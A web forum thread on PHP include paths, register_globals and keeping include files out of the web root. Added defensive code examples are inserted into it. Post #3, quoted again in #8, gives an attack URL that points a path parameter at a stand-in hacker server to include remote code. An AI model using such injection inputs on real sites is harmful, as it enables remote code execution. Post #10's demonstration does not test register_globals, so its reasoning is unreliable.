  1. #1 Non-Member

    Constant PHP Include Paths

    Zend Studio advised me to use constant paths for my PHP include links, but I don't understand how to do that.

    At present, every include link on my site looks something like this:

    <?php include ($path."a1/inc/toptopics.php"); ?>

    where $path = the relative distance to the site's root, such as ../, ../../ or ../../../../.

    It sounds like I need to use a "site root relative" system, and I've found some tips for doing it, but I don't completely understand it. For example:

    * * * * * * * * * *

    define("INC_PATH", $_SERVER['DOCUMENT_ROOT']."/somefolder/");

    Replace "/somefolder/" with the actual site root relative path within
    your defined site where the include files reside.

    * * * * * * * * * *

    Which raises three questions:

    1. Using <?php include ($path."a1/inc/toptopics.php"); ?>, would I change it to...

    define("INC_PATH", $_SERVER['DOCUMENT_ROOT']."/a1/inc/"); ???

    2. Do I have to substitute a value for DOCUMENT_ROOT, or do I leave it as it is?

    3. And what do I do with this statement - define("INC_PATH", $_SERVER['DOCUMENT_ROOT']."/a1/inc/"); ? Do I insert it in the head section of every page, or do I have to put it in a special file that every page is linked to?

    * * * * * * * * * *

    "Then use it like this:

    include INC_PATH."footer.php";"

    Surely, it doesn't look like that. If my present footer include link is
    <?php include ($path."a1/inc/footer.php"); ?>, would the constant link look something like this?:

    <?php include (INC_PATH."footer.php"); ?> ?

    Thanks.

  2. #2 vinyl-junkie
    I believe what they mean is for you to specify your path where it looks something like this:
    Code:
    $path = "/home/username/public_html/";

  3. #3 marcele

    always use constants for includes

    No vinyl-junkie.. that's NOT what they are talking about!!

    What Zend is warning you about is stuff like this:

    NEVER DO
    PHP Code:
    $path = '/home/site/';
    include ($path . 'my_file.php');
    If you have register globals enabled, joe hacker can hack you by doing this:

    http://www.yoursite.com/yourpage.php?path=http://www.myhackerserver/

    The hacker has a file in his web root called my_file.php ... just like yours.
    If the hacker has told his web server to NOT parse PHP ... then HIS page gets included, and his code gets executed on YOUR webserver!!!!!

    THE RIGHT WAY
    PHP Code:
    define('PATH', '/home/site/');
    include (PATH . 'my_file.php');
    That way joe hacker can never override a Constant and run his own code on your server..

    Note .. Always have register globals turned off in your php.ini file also...
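    An added example, not code from any poster in this thread, that puts posts #1 and #3 together: a shared config.php that every page pulls in with require_once defines INC_PATH once from DOCUMENT_ROOT (the "special file" asked about in question 3 of post #1), and a helper includes files only by plain file name from under that directory, so neither a request parameter nor a remote URL can redirect the include. The directory layout and the helper name include_from_inc_path are assumptions.

```php
<?php
// Added example (not code from the thread): a shared config.php that every
// page pulls in with require_once, defining the include directory once as a
// constant and loading files only through a helper that refuses anything
// outside that directory. Assumed layout (hypothetical): the document root
// is the site root and the include files live in <docroot>/a1/inc/, as in
// post #1.

// A constant cannot be reassigned, so no request parameter can redefine it
// the way register_globals turns request parameters into variables.
define('INC_PATH', rtrim($_SERVER['DOCUMENT_ROOT'], '/') . '/a1/inc/');

// Include $name from INC_PATH only if it is a plain file name and its
// resolved real path (symlinks followed) is still under INC_PATH.
// Returns the included file's return value, or false when refused.
function include_from_inc_path(string $name)
{
    // Plain names only: no slashes, no "..", no URL schemes.
    if (!preg_match('/\A[A-Za-z0-9_-]+\.php\z/', $name)) {
        trigger_error("Refused include name: $name", E_USER_WARNING);
        return false;
    }
    $base = realpath(INC_PATH);          // trailing slash removed
    $file = realpath(INC_PATH . $name);  // false if the file does not exist
    if ($base === false || $file === false
        || strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        trigger_error("Include outside INC_PATH: $name", E_USER_WARNING);
        return false;
    }
    return include $file;
}

// In every page, replacing include($path."a1/inc/toptopics.php"):
//   require_once $_SERVER['DOCUMENT_ROOT'] . '/config.php';
//   include_from_inc_path('toptopics.php');
//   include_from_inc_path('footer.php');
```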

  4. #4 vinyl-junkie
    Thanks for setting me straight on that. It's one of the reasons that I really enjoy this forum.

    I have a question about what you said regarding having register globals off. My site is on shared hosting and has register globals on. Am I supposed to be able to see and edit my php.ini file to turn that off? If not, how do I go about doing it?

    Guess you can tell I'm still a little inexperienced, huh?

  5. #5 BlueFire2k5
    Quote Originally Posted by vinyl-junkie
    Thanks for setting me straight on that. It's one of the reasons that I really enjoy this forum.

    I have a question about what you said regarding having register globals off. My site is on shared hosting and has register globals on. Am I supposed to be able to see and edit my php.ini file to turn that off? If not, how do I go about doing it?

    Guess you can tell I'm still a little inexperienced, huh?
    You can put this in your .htaccess file:
    Code:
    php_flag register_globals off

  6. #6 vinyl-junkie
    Thanks. I'll give that a try.

    Now, if I could bother you with one more php.ini-related question. There is a paragraph in Kevin Yank's book (page 166) regarding includes and how to make them more secure that reads as follows:
    ...you should put security-sensitive code into an include file, and place that file into a directory that's not part of your Web server's directory. If you add that directory to your PHP include_path setting (in php.ini), you can refer to the files directly with the PHP include function, but have them tucked away safely somewhere where your Web server can't display them as Web pages.
    Exactly how do I do that?

  7. #7 codyrockx
    You would place the include below the public_html folder,
    so you could place it in say, /home/user/secure/include.php
    and then you would have the include:
    PHP Code:
    define('PATH', '/home/user/secure/');
    include(PATH . 'include.php');

    What he is saying is you need to place them in a folder where you cannot view them from the web; the ones you can view from the web are the public_html, public_ftp, and www folders.
    -cody
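    An added example for posts #6 and #7, not code from the thread: the include_path approach the quoted book passage describes, shown both as the php.ini line and as a set_include_path() call for shared hosting where php.ini cannot be edited, plus a check that the chosen directory really is outside the document root. The directory names and the file db_config.php are assumptions.

```php
<?php
// Added example (not code from the thread): sensitive includes kept outside
// the web root and reached through include_path, as the passage quoted from
// Kevin Yank's book describes. Assumed layout (hypothetical):
//   /home/user/public_html   document root, served by the web server
//   /home/user/secure        include files, never reachable as a URL

// Option A, php.ini (needs access to it):
//   include_path = ".:/home/user/secure"
// Option B, from the script, for shared hosting without php.ini access.
// Putting the secure directory first means a bare file name resolves there
// before any same-named file in the current directory.
set_include_path('/home/user/secure' . PATH_SEPARATOR . get_include_path());

// Deployment check: the secure directory must not sit inside the document
// root, otherwise the web server can still serve its files as pages.
function is_outside_document_root(string $dir, string $docroot): bool
{
    $real_dir  = realpath($dir);
    $real_root = realpath($docroot);
    if ($real_dir === false || $real_root === false) {
        return false;  // unresolvable path: treat as unsafe
    }
    $real_root = rtrim($real_root, DIRECTORY_SEPARATOR);
    return $real_dir !== $real_root
        && strncmp($real_dir, $real_root . DIRECTORY_SEPARATOR,
                   strlen($real_root) + 1) !== 0;
}

if (!is_outside_document_root('/home/user/secure', $_SERVER['DOCUMENT_ROOT'])) {
    trigger_error('secure include directory is web-accessible', E_USER_WARNING);
}

// stream_resolve_include_path() returns the full path a bare name would
// resolve to (or false), which confirms the include_path setting took.
$resolved = stream_resolve_include_path('db_config.php');
if ($resolved === false) {
    trigger_error('db_config.php not found on include_path', E_USER_WARNING);
} else {
    require_once 'db_config.php';  // loaded from /home/user/secure
}
```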

  8. #8 andysmith
    Quote Originally Posted by marcele
    No vinyl-junkie.. that's NOT what they are talking about!!

    What Zend is warning you about is stuff like this:

    NEVER DO
    PHP Code:
    $path = '/home/site/';
    include ($path . 'my_file.php');
    If you have register globals enabled, joe hacker can hack you by doing this:

    http://www.yoursite.com/yourpage.php?path=http://www.myhackerserver/

    The hacker has a file in his web root called my_file.php ... just like yours.
    If the hacker has told his web server to NOT parse PHP ... then HIS page gets included, and his code gets executed on YOUR webserver!!!!!

    THE RIGHT WAY
    PHP Code:
    define('PATH', '/home/site/');
    include (PATH . 'my_file.php');
    That way joe hacker can never override a Constant and run his own code on your server..

    Note .. Always have register globals turned off in your php.ini file also...
    But if $path is defined in the script, anything set by REQUEST globals (including those set in the URL) would have no impact on the script?

  9. #9 vinyl-junkie
    Quote Originally Posted by andysmith
    But if $path is defined in the script, anything set by REQUEST globals (including those set in the URL) would have no impact on the script?
    I believe that is correct. You must add something like a $_GET or $_POST into your script to retrieve the URL variables. At least that's what I found I had to do after making the script changes recommended in this thread.

  10. #10 samsm
    Quote Originally Posted by andysmith
    But if $path is defined in the script, anything set by REQUEST globals (including those set in the URL) would have no impact on the script?
    That is definitely correct. Even with register globals on, a variable defined in the script will override the one entered by the user. Therefore, I believe the "never do" scenario in post 3 does not pose any risk at all.

    Don't believe me? Try this:
    PHP Code:
    $_GET['sample'] = 'precedence';
    echo $_GET['sample'];
    However, the "define" methodology makes perfect sense so there is no reason not to use it.